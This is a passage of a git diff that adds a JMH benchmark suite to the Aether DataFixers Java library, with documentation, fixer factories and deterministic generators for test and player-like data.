  • Same-ecosystem: Jackson JSON ↔ Jackson YAML is fastest (shared JsonNode)
  • Cross-ecosystem: Gson ↔ SnakeYAML requires full tree traversal
  • Asymmetry: A→B may differ from B→A due to construction costs

Interpreting Results

  • Throughput: Higher ops/sec is better for high-volume scenarios
  • Average time: Lower latency is better for interactive applications
  • Scaling: Compare SMALL vs MEDIUM vs LARGE to understand data volume impact
  • Variance: High ± values may indicate GC sensitivity or JIT instability
+ * + * @see de.splatgames.aether.datafixers.benchmarks.format.JsonBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.format.YamlBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.format.TomlXmlBenchmark + * @see de.splatgames.aether.datafixers.benchmarks.format.CrossFormatBenchmark + * @see de.splatgames.aether.datafixers.api.dynamic.DynamicOps + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks.format; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java new file mode 100644 index 0000000..be94d9b --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/package-info.java @@ -0,0 +1,191 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +/** + * JMH benchmark suite for the Aether DataFixers framework. + * + *

This package and its sub-packages provide comprehensive performance benchmarks for all major components of the Aether DataFixers system. The benchmarks use JMH (Java Microbenchmark Harness) for accurate, reliable performance measurements.


Package Structure

Package | Focus Area | Key Benchmarks
{@link de.splatgames.aether.datafixers.benchmarks.core core} | DataFixer migration performance | SingleFixBenchmark, MultiFixChainBenchmark, SchemaLookupBenchmark
{@link de.splatgames.aether.datafixers.benchmarks.codec codec} | Codec encode/decode performance | PrimitiveCodecBenchmark, CollectionCodecBenchmark
{@link de.splatgames.aether.datafixers.benchmarks.concurrent concurrent} | Thread-safety and scalability | ConcurrentMigrationBenchmark
{@code format} | DynamicOps format comparisons | JsonBenchmark, YamlBenchmark, CrossFormatBenchmark
{@link de.splatgames.aether.datafixers.benchmarks.util util} | Benchmark infrastructure | BenchmarkBootstrap, BenchmarkDataGenerator, PayloadSize

Running Benchmarks


Via Maven (Development)

{@code
# Run all benchmarks
mvn exec:java -pl aether-datafixers-benchmarks

# Run specific benchmark
mvn exec:java -pl aether-datafixers-benchmarks -Dexec.args="SingleFixBenchmark"
}

Via Fat JAR (Production)

{@code
# Build the benchmark JAR
mvn clean package -pl aether-datafixers-benchmarks -DskipTests

# Run all benchmarks
java -jar target/aether-datafixers-benchmarks-*-benchmarks.jar

# List available benchmarks
java -jar target/*-benchmarks.jar -l

# Run with parameters
java -jar target/*-benchmarks.jar -p payloadSize=LARGE -wi 5 -i 10 -f 2

# Output JSON results
java -jar target/*-benchmarks.jar -rf json -rff results.json
}

Programmatic API

{@code
// Run all benchmarks
BenchmarkRunner.runAllBenchmarks();

// Run quick validation
BenchmarkRunner.runQuickBenchmarks();

// Run specific category
BenchmarkRunner.runCoreBenchmarks();
BenchmarkRunner.runFormatBenchmarks();
}

Benchmark Categories Explained


Core Benchmarks


Measure the fundamental DataFixer operations:

  • Single fix: Baseline performance for one migration step
  • Chain migration: How performance scales with migration path length
  • Schema lookup: Registry access patterns and caching effectiveness
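
For example, the chain-scaling measurement reduces to a sketch like the following (helper names from the util package; versions follow the v1 → v(fixCount+1) convention used there):

{@code
// 10 sequential rename fixes: v1 -> v11.
DataFixer fixer = BenchmarkBootstrap.createChainFixer(10);
Dynamic input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);
Dynamic migrated = fixer.update(
        BenchmarkBootstrap.BENCHMARK_TYPE, input,
        new DataVersion(1), new DataVersion(11));
}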

Codec Benchmarks


Measure serialization and deserialization performance:

  • Primitive codecs: Baseline for bool, int, long, float, double, string
  • Collection codecs: List encoding/decoding with size scaling
  • Round-trip: Combined encode + decode performance

Concurrent Benchmarks


Validate thread-safety and measure scalability:

  • Multi-threaded migration: Contention under concurrent load
  • Registry access: Concurrent read performance
  • Scaling analysis: Fixed thread counts (4, 8, MAX)

Format Benchmarks


Compare different DynamicOps implementations:

  • JSON: GsonOps vs JacksonJsonOps
  • YAML: SnakeYamlOps vs JacksonYamlOps
  • Other: TOML and XML via Jackson
  • Cross-format: Conversion between formats

Default Configuration

Setting | Value | Purpose
Warmup iterations | 5 | JIT compilation stabilization
Measurement iterations | 10 | Statistical significance
Forks | 2 | JVM variance mitigation
JVM heap | 2 GB | Avoid GC interference
Time unit | Varies | ns for primitives, µs for complex ops
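
These defaults translate directly into the JMH annotations carried by each benchmark class; a representative sketch (the class name is a placeholder, and the time unit varies per class as noted above):

{@code
@BenchmarkMode({Mode.Throughput, Mode.AverageTime})
@OutputTimeUnit(TimeUnit.MICROSECONDS)
@State(Scope.Benchmark)
@Warmup(iterations = 5, time = 1, timeUnit = TimeUnit.SECONDS)
@Measurement(iterations = 10, time = 1, timeUnit = TimeUnit.SECONDS)
@Fork(value = 2, jvmArgs = {"-Xms2G", "-Xmx2G"})
public class SomeBenchmark { /* ... */ }
}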

Interpreting Results

  • Throughput (ops/time): Higher is better; measures operation rate
  • Average time (time/op): Lower is better; measures latency
  • Error (±): 99.9% confidence interval; smaller is more reliable
  • Scaling: Compare across parameter values (payload size, thread count)

Common JMH Options

Option | Description
{@code -wi N} | Number of warmup iterations
{@code -i N} | Number of measurement iterations
{@code -f N} | Number of forks (JVM instances)
{@code -t N} | Number of threads
{@code -p key=value} | Set parameter value
{@code -rf format} | Result format (json, csv, text)
{@code -rff file} | Result output file
{@code -prof profiler} | Enable profiler (gc, async, jfr)
{@code -l} | List available benchmarks
{@code -h} | Show help

Best Practices

  • Isolated environment: Run on dedicated hardware with minimal background processes
  • Multiple forks: Use at least 2 forks for reliable results
  • Sufficient warmup: Allow JIT compilation to stabilize before measurement
  • Consistent conditions: Compare results from the same machine and JVM version
  • Statistical analysis: Consider error margins when comparing results
+ * + * @see de.splatgames.aether.datafixers.benchmarks.BenchmarkRunner + * @see de.splatgames.aether.datafixers.benchmarks.core + * @see de.splatgames.aether.datafixers.benchmarks.codec + * @see de.splatgames.aether.datafixers.benchmarks.concurrent + * @see de.splatgames.aether.datafixers.benchmarks.util + * @since 1.0.0 + */ +package de.splatgames.aether.datafixers.benchmarks; diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java new file mode 100644 index 0000000..1139e7e --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkBootstrap.java @@ -0,0 +1,376 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.util; + +import com.google.gson.JsonElement; +import de.splatgames.aether.datafixers.api.DataVersion; +import de.splatgames.aether.datafixers.api.TypeReference; +import de.splatgames.aether.datafixers.api.fix.DataFix; +import de.splatgames.aether.datafixers.api.fix.DataFixer; +import de.splatgames.aether.datafixers.codec.json.gson.GsonOps; +import de.splatgames.aether.datafixers.core.fix.DataFixerBuilder; +import de.splatgames.aether.datafixers.core.fix.noop.NoOpDataFixerContext; +import de.splatgames.aether.datafixers.testkit.factory.QuickFix; +import org.jetbrains.annotations.NotNull; + +/** + * Factory for pre-configured {@link DataFixer} instances optimized for benchmarking. + * + *

This utility class provides various DataFixer configurations for measuring different aspects of migration performance. All created fixers use {@link NoOpDataFixerContext} to eliminate logging overhead during benchmark measurements.


Available Fixer Configurations

Method | Fix Count | Fix Types | Use Case
{@link #createSingleFixFixer()} | 1 | Rename | Baseline single-operation performance
{@link #createIdentityFixer()} | 1 | Identity (no-op) | Framework overhead measurement
{@link #createChainFixer(int)} | 1-100 | Rename (homogeneous) | Chain length scaling analysis
{@link #createMixedFixer(int)} | 4+ | Rename, Add, Remove, Transform | Realistic migration scenarios
{@link #createPlayerFixer()} | 4 | Mixed (realistic) | Domain-specific migration testing

Type References


Two type references are provided for categorizing benchmark data:

  • {@link #BENCHMARK_TYPE} - Generic benchmark data (used by most benchmarks)
  • {@link #PLAYER_TYPE} - Player-like data structures (for domain-specific tests)

Design Considerations

  • No-op context: All fixers use {@link NoOpDataFixerContext} to prevent logging from affecting benchmark measurements
  • GsonOps: All fixes use {@link GsonOps} as the reference DynamicOps implementation for consistency
  • Testkit integration: Uses {@link QuickFix} from the testkit module for efficient fix creation

Usage Example

{@code
// In a JMH benchmark setup method
@Setup(Level.Trial)
public void setup() {
    this.fixer = BenchmarkBootstrap.createChainFixer(10);
    this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);
}

@Benchmark
public void benchmarkMigration(Blackhole blackhole) {
    Dynamic result = fixer.update(
        BenchmarkBootstrap.BENCHMARK_TYPE,
        input,
        new DataVersion(1),
        new DataVersion(11)
    );
    blackhole.consume(result);
}
}
+ * + * @author Erik Pförtner + * @see BenchmarkDataGenerator + * @see PayloadSize + * @see de.splatgames.aether.datafixers.testkit.factory.QuickFix + * @since 1.0.0 + */ +public final class BenchmarkBootstrap { + + /** + * Type reference for generic benchmark data. + * + *

Used by most benchmarks as the default type for test data. The type name "benchmark" is intentionally generic to avoid confusion with domain-specific types.

+ */ + public static final TypeReference BENCHMARK_TYPE = new TypeReference("benchmark"); + + /** + * Type reference for player-like benchmark data. + * + *

Used by benchmarks that simulate game player data migrations, providing a realistic domain-specific testing scenario.

+ * + * @see #createPlayerFixer() + * @see BenchmarkDataGenerator#generatePlayerData(DynamicOps) + */ + public static final TypeReference PLAYER_TYPE = new TypeReference("player"); + + /** + * Private constructor to prevent instantiation. + */ + private BenchmarkBootstrap() { + // Utility class + } + + /** + * Creates a DataFixer with a single field rename fix (v1 → v2). + * + *

This is the simplest non-trivial fixer configuration, useful for measuring baseline single-operation performance. The fix renames a field from "oldName" to "newName".


Version mapping: v1 → v2 (single step)

+ * + * @return a new DataFixer configured for single-fix benchmarks + * @see #createIdentityFixer() + */ + @NotNull + public static DataFixer createSingleFixFixer() { + return new DataFixerBuilder(new DataVersion(2)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE) + .addFix(BENCHMARK_TYPE, QuickFix.renameField( + GsonOps.INSTANCE, + "rename_field_v1_v2", + 1, 2, + "oldName", "newName")) + .build(); + } + + /** + * Creates a DataFixer with an identity fix (no-op transformation). + * + *
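
A short usage sketch for the factory above, driving the single v1 → v2 step over generated data:

{@code
DataFixer fixer = BenchmarkBootstrap.createSingleFixFixer();
Dynamic input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.SMALL);

// Applies the one rename fix: "oldName" -> "newName".
Dynamic migrated = fixer.update(
        BenchmarkBootstrap.BENCHMARK_TYPE, input,
        new DataVersion(1), new DataVersion(2));
}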

The identity fixer passes data through without modification, useful for measuring pure framework overhead including:

  • Version checking and fix selection
  • Dynamic wrapper creation and manipulation
  • DataResult monad operations
  • Type reference resolution

Comparing identity fixer performance against {@link #createSingleFixFixer()} reveals the actual cost of field operations versus framework overhead.


Version mapping: v1 → v2 (no data changes)

+ * + * @return a new DataFixer with an identity (pass-through) fix + * @see #createSingleFixFixer() + */ + @NotNull + public static DataFixer createIdentityFixer() { + return new DataFixerBuilder(new DataVersion(2)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE) + .addFix(BENCHMARK_TYPE, QuickFix.identity("identity_v1_v2", 1, 2)) + .build(); + } + + /** + * Creates a DataFixer with a chain of sequential homogeneous fixes. + * + *

Each fix in the chain performs a field rename operation (field1 → field2, field2 → field3, etc.), simulating migration scenarios with multiple consecutive version upgrades. This configuration is ideal for measuring how migration performance scales with chain length.


Version mapping: v1 → v2 → v3 → ... → v(fixCount+1)


Typical Parameter Values for Benchmarks

fixCount | Scenario
1 | Baseline (compare with {@link #createSingleFixFixer()})
5 | Short chain (minor version updates)
10 | Medium chain (typical upgrade path)
25 | Long chain (significant version gap)
50 | Stress test (extended migration)
100 | Maximum supported (extreme case)
+ * + * @param fixCount the number of fixes in the chain (must be between 1 and 100 inclusive) + * @return a new DataFixer with the specified number of sequential rename fixes + * @throws IllegalArgumentException if fixCount is less than 1 or greater than 100 + * @see #createMixedFixer(int) + */ + @NotNull + public static DataFixer createChainFixer(final int fixCount) { + if (fixCount < 1 || fixCount > 100) { + throw new IllegalArgumentException("fixCount must be between 1 and 100"); + } + + final DataFixerBuilder builder = new DataFixerBuilder(new DataVersion(fixCount + 1)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE); + + for (int i = 0; i < fixCount; i++) { + final int fromVersion = i + 1; + final int toVersion = i + 2; + final DataFix fix = QuickFix.renameField( + GsonOps.INSTANCE, + "rename_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "field" + fromVersion, "field" + toVersion); + builder.addFix(BENCHMARK_TYPE, fix); + } + + return builder.build(); + } + + /** + * Creates a DataFixer with mixed heterogeneous fix types for realistic benchmarking. + * + *
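
Driving the resulting chain end to end is then a one-call sketch (all fixCount steps applied in a single update):

{@code
int fixCount = 25;
DataFixer fixer = BenchmarkBootstrap.createChainFixer(fixCount);
Dynamic input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);

// v1 -> v(fixCount + 1): all 25 rename fixes run in sequence.
Dynamic migrated = fixer.update(
        BenchmarkBootstrap.BENCHMARK_TYPE, input,
        new DataVersion(1), new DataVersion(fixCount + 1));
}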

Unlike {@link #createChainFixer(int)}, which uses only rename operations, this method creates a chain with rotating fix types that more accurately represent real-world migration scenarios:

Position (mod 4) | Fix Type | Operation
0 | Rename | Renames a field
1 | Add | Adds a new string field with default value
2 | Remove | Removes a field
3 | Transform | Transforms field value (string concatenation)

Version mapping: v1 → v2 → v3 → ... → v(fixCount+1)


Comparing mixed fixer performance against chain fixer performance reveals the relative cost of different fix operations.

+ * + * @param fixCount the number of fixes in the chain (must be at least 4 to include all fix types) + * @return a new DataFixer with mixed fix types cycling through rename, add, remove, and transform operations + * @throws IllegalArgumentException if fixCount is less than 4 + * @see #createChainFixer(int) + */ + @NotNull + public static DataFixer createMixedFixer(final int fixCount) { + if (fixCount < 4) { + throw new IllegalArgumentException("fixCount must be at least 4 for mixed fixes"); + } + + final DataFixerBuilder builder = new DataFixerBuilder(new DataVersion(fixCount + 1)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE); + + for (int i = 0; i < fixCount; i++) { + final int fromVersion = i + 1; + final int toVersion = i + 2; + final DataFix fix = createMixedFix(fromVersion, toVersion, i % 4); + builder.addFix(BENCHMARK_TYPE, fix); + } + + return builder.build(); + } + + /** + * Creates a DataFixer for player data migration benchmarks. + * + *
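
Since both factories share the v1 → v(fixCount+1) version mapping, a side-by-side comparison is a straightforward sketch:

{@code
DataFixer chain = BenchmarkBootstrap.createChainFixer(8); // rename only
DataFixer mixed = BenchmarkBootstrap.createMixedFixer(8); // rename/add/remove/transform
Dynamic input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);

// Identical version span; timing differences stem from the fix types alone.
Dynamic viaChain = chain.update(BenchmarkBootstrap.BENCHMARK_TYPE, input,
        new DataVersion(1), new DataVersion(9));
Dynamic viaMixed = mixed.update(BenchmarkBootstrap.BENCHMARK_TYPE, input,
        new DataVersion(1), new DataVersion(9));
}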

This fixer simulates a realistic game player data migration scenario with four sequential fixes representing typical schema evolution:

Version | Fix | Description
v1 → v2 | Rename | {@code name} → {@code playerName}
v2 → v3 | Add | Add {@code score} field (default: 0)
v3 → v4 | Transform | Double the {@code level} value
v4 → v5 | Remove | Remove {@code tempField}

Use with {@link BenchmarkDataGenerator#generatePlayerData(DynamicOps)} for complete domain-specific migration testing.

+ * + * @return a new DataFixer configured for player data migrations (v1 → v5) + * @see #PLAYER_TYPE + * @see BenchmarkDataGenerator#generatePlayerData(DynamicOps) + */ + @NotNull + public static DataFixer createPlayerFixer() { + return new DataFixerBuilder(new DataVersion(5)) + .withDefaultContext(NoOpDataFixerContext.INSTANCE) + .addFix(PLAYER_TYPE, QuickFix.renameField( + GsonOps.INSTANCE, "rename_name_v1_v2", 1, 2, + "name", "playerName")) + .addFix(PLAYER_TYPE, QuickFix.addIntField( + GsonOps.INSTANCE, "add_score_v2_v3", 2, 3, + "score", 0)) + .addFix(PLAYER_TYPE, QuickFix.transformField( + GsonOps.INSTANCE, "double_level_v3_v4", 3, 4, + "level", field -> field.createInt( + field.asInt().result().orElse(1) * 2))) + .addFix(PLAYER_TYPE, QuickFix.removeField( + GsonOps.INSTANCE, "remove_temp_v4_v5", 4, 5, + "tempField")) + .build(); + } + + /** + * Creates a specific fix type based on the fixType selector. + * + *
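
Paired with the matching generator, a complete domain-specific run is a short sketch:

{@code
DataFixer fixer = BenchmarkBootstrap.createPlayerFixer();
Dynamic player = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);

// Applies all four fixes: rename name, add score, double level, drop tempField.
Dynamic migrated = fixer.update(
        BenchmarkBootstrap.PLAYER_TYPE, player,
        new DataVersion(1), new DataVersion(5));
}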

Internal factory method used by {@link #createMixedFixer(int)} to create different fix types in a rotating pattern.

+ * + * @param fromVersion the source version for the fix + * @param toVersion the target version for the fix + * @param fixType the fix type selector (0=rename, 1=add, 2=remove, 3=transform) + * @return a DataFix of the specified type + */ + private static DataFix createMixedFix(final int fromVersion, + final int toVersion, + final int fixType) { + return switch (fixType) { + case 0 -> QuickFix.renameField( + GsonOps.INSTANCE, + "rename_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "renamedField", "renamedField"); + case 1 -> QuickFix.addStringField( + GsonOps.INSTANCE, + "add_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "newField" + toVersion, "default"); + case 2 -> QuickFix.removeField( + GsonOps.INSTANCE, + "remove_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "removedField" + fromVersion); + case 3 -> QuickFix.transformField( + GsonOps.INSTANCE, + "transform_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion, + "transformedField", + field -> field.createString( + field.asString().result().orElse("") + "_transformed")); + default -> QuickFix.identity( + "identity_v" + fromVersion + "_v" + toVersion, + fromVersion, toVersion); + }; + } +} diff --git a/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java new file mode 100644 index 0000000..19a93cc --- /dev/null +++ b/aether-datafixers-benchmarks/src/main/java/de/splatgames/aether/datafixers/benchmarks/util/BenchmarkDataGenerator.java @@ -0,0 +1,324 @@ +/* + * Copyright (c) 2026 Splatgames.de Software and Contributors + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in all + * copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +package de.splatgames.aether.datafixers.benchmarks.util; + +import de.splatgames.aether.datafixers.api.dynamic.Dynamic; +import de.splatgames.aether.datafixers.api.dynamic.DynamicOps; +import de.splatgames.aether.datafixers.testkit.TestData; +import de.splatgames.aether.datafixers.testkit.TestDataBuilder; +import org.jetbrains.annotations.NotNull; + +/** + * Factory for generating benchmark test data with configurable complexity. + * + *

This utility class creates {@link Dynamic} objects of varying sizes and structures for use in JMH benchmarks. Data generation is format-agnostic, working with any {@link DynamicOps} implementation.


Data Generation Methods

Method | Structure | Use Case
{@link #generate(DynamicOps, PayloadSize)} | Complex (fields + nesting + lists) | General-purpose benchmarks
{@link #generatePlayerData(DynamicOps)} | Domain-specific (player data) | Realistic migration scenarios
{@link #generateFlat(DynamicOps, int)} | Flat object (fields only) | Basic operation benchmarks
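
All three entry points share the same shape; a quick sketch of choosing between them:

{@code
// Complex structure with nesting and lists, sized by PayloadSize.
Dynamic complex = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);

// Realistic player-shaped document for domain-specific fixers.
Dynamic player = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);

// 20 flat string fields, no nesting - minimal traversal overhead.
Dynamic flat = BenchmarkDataGenerator.generateFlat(GsonOps.INSTANCE, 20);
}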

Generated Data Structure


The main {@link #generate(DynamicOps, PayloadSize)} method creates objects with:

{@code
{
  "stringField0": "value0",
  "intField0": 0,
  "boolField0": true,
  "stringField1": "value1",
  ...
  "nested": {
    "level": 4,
    "data": "nested-level-4",
    "timestamp": 1234567890,
    "child": {
      "level": 3,
      ...
    }
  },
  "items": [
    {"id": "item-0", "quantity": 1, "active": true},
    {"id": "item-1", "quantity": 2, "active": false},
    ...
  ]
}
}

Design Considerations

  • Testkit integration: Uses {@link TestDataBuilder} for fluent, type-safe data construction
  • Format agnostic: Works with any DynamicOps (Gson, Jackson, YAML, etc.)
  • Deterministic: Generated data is fully reproducible for benchmark consistency
  • Configurable complexity: {@link PayloadSize} controls data volume

Usage Example

{@code
// In a JMH benchmark
@Setup(Level.Iteration)
public void setup() {
    // Generate medium-complexity test data
    this.input = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.MEDIUM);

    // Or generate player-specific data
    this.playerData = BenchmarkDataGenerator.generatePlayerData(GsonOps.INSTANCE);
}
}
+ * + * @author Erik Pförtner + * @see PayloadSize + * @see BenchmarkBootstrap + * @see de.splatgames.aether.datafixers.testkit.TestDataBuilder + * @since 1.0.0 + */ +public final class BenchmarkDataGenerator { + + /** + * Fixed timestamp value used for deterministic benchmark data generation. + * + *

Using a constant timestamp ensures reproducible benchmark results across different runs, eliminating variability from system time.

+ */ + private static final long FIXED_TIMESTAMP = 1704067200000L; // 2024-01-01 00:00:00 UTC + + /** + * Private constructor to prevent instantiation. + */ + private BenchmarkDataGenerator() { + // Utility class + } + + /** + * Generates benchmark data with the specified payload size and complexity. + * + *

Creates a complex object structure including:

  • Primitive fields: String, integer, and boolean fields based on {@link PayloadSize#getFieldCount()}
  • Nested objects: Recursive nesting up to {@link PayloadSize#getNestingDepth()} levels
  • List with items: An "items" array with {@link PayloadSize#getListSize()} objects

Field Naming Patterns

Field Type | Pattern | Example
String | {@code stringFieldN} | {@code stringField0: "value0"}
Integer | {@code intFieldN} | {@code intField0: 0}
Boolean | {@code boolFieldN} | {@code boolField0: true}
+ * + * @param ops the DynamicOps implementation to use for data creation + * @param size the payload size configuration controlling data complexity + * @param the underlying value type of the DynamicOps + * @return a new Dynamic containing the generated benchmark data + */ + @NotNull + public static Dynamic generate(@NotNull final DynamicOps ops, + @NotNull final PayloadSize size) { + final TestDataBuilder builder = TestData.using(ops).object(); + + // Add primitive fields + for (int i = 0; i < size.getFieldCount(); i++) { + builder.put("stringField" + i, "value" + i); + builder.put("intField" + i, i * 100); + builder.put("boolField" + i, i % 2 == 0); + } + + // Add nested objects + addNestedObject(builder, "nested", size.getNestingDepth()); + + // Add list with items + builder.putList("items", list -> { + for (int i = 0; i < size.getListSize(); i++) { + final int index = i; + list.addObject(item -> item + .put("id", "item-" + index) + .put("quantity", index + 1) + .put("active", index % 3 == 0)); + } + }); + + return builder.build(); + } + + /** + * Generates a player-like data structure for realistic migration benchmarks. + * + *
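
Given that naming scheme, reading a generated field back is a one-liner; a small sketch using the Dynamic accessors seen elsewhere in this module:

{@code
Dynamic data = BenchmarkDataGenerator.generate(GsonOps.INSTANCE, PayloadSize.SMALL);

// "stringField0" exists for every payload size (field count >= 1).
String value = data.get("stringField0").asString().result().orElse("");
}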

Creates a structure simulating game player data, useful for domain-specific migration testing with {@link BenchmarkBootstrap#createPlayerFixer()}.


Generated Structure

{@code
{
  "id": "player-benchmark-12345",
  "name": "BenchmarkPlayer",
  "level": 50,
  "experience": 125000,
  "health": 100.0,
  "active": true,
  "position": {"x": 100.5, "y": 64.0, "z": -200.25, "world": "overworld"},
  "stats": {"strength": 15, "agility": 12, "intelligence": 18, "luck": 7},
  "inventory": [{"slot": 0, "itemId": "minecraft:item_0", "count": 1, "damage": 0}, ...],
  "achievements": ["first_login", "level_10", "level_25", "level_50", ...]
}
}

Data Characteristics

Component | Count | Description
Top-level fields | 6 | id, name, level, experience, health, active
Nested objects | 2 | position (4 fields), stats (4 fields)
Inventory slots | 36 | Standard inventory size
Achievements | 6 | String list
+ * + * @param ops the DynamicOps implementation to use for data creation + * @param the underlying value type of the DynamicOps + * @return a new Dynamic containing player-like benchmark data + * @see BenchmarkBootstrap#createPlayerFixer() + * @see BenchmarkBootstrap#PLAYER_TYPE + */ + @NotNull + public static Dynamic generatePlayerData(@NotNull final DynamicOps ops) { + return TestData.using(ops) + .object() + .put("id", "player-benchmark-12345") + .put("name", "BenchmarkPlayer") + .put("level", 50) + .put("experience", 125000L) + .put("health", 100.0) + .put("active", true) + .putObject("position", pos -> pos + .put("x", 100.5) + .put("y", 64.0) + .put("z", -200.25) + .put("world", "overworld")) + .putObject("stats", stats -> stats + .put("strength", 15) + .put("agility", 12) + .put("intelligence", 18) + .put("luck", 7)) + .putList("inventory", inv -> { + for (int i = 0; i < 36; i++) { + final int slot = i; + inv.addObject(item -> item + .put("slot", slot) + .put("itemId", "minecraft:item_" + slot) + .put("count", (slot % 64) + 1) + .put("damage", 0)); + } + }) + .putList("achievements", list -> list + .add("first_login") + .add("level_10") + .add("level_25") + .add("level_50") + .add("explorer") + .add("master_crafter")) + .build(); + } + + /** + * Generates a simple flat object with only string fields. + * + *

Creates a minimal object structure without nesting or lists, useful for benchmarking basic field access and manipulation operations with minimal traversal overhead.


Generated Structure

{@code
{
  "field0": "value0",
  "field1": "value1",
  "field2": "value2",
  ...
}
}

This method is useful for isolating field operation costs from structural complexity overhead.

+ * + * @param ops the DynamicOps implementation to use for data creation + * @param fieldCount the number of string fields to generate (field0 through field(n-1)) + * @param the underlying value type of the DynamicOps + * @return a new Dynamic containing a flat object with string fields + */ + @NotNull + public static Dynamic generateFlat(@NotNull final DynamicOps ops, + final int fieldCount) { + final TestDataBuilder builder = TestData.using(ops).object(); + for (int i = 0; i < fieldCount; i++) { + builder.put("field" + i, "value" + i); + } + return builder.build(); + } + + /** + * Recursively adds nested object structures to the builder. + * + *

Creates a chain of nested objects, each containing:

  • {@code level} - the current nesting depth
  • {@code data} - a string identifying the nesting level
  • {@code timestamp} - fixed timestamp for reproducibility
  • {@code child} - the next nested level (if depth > 0)
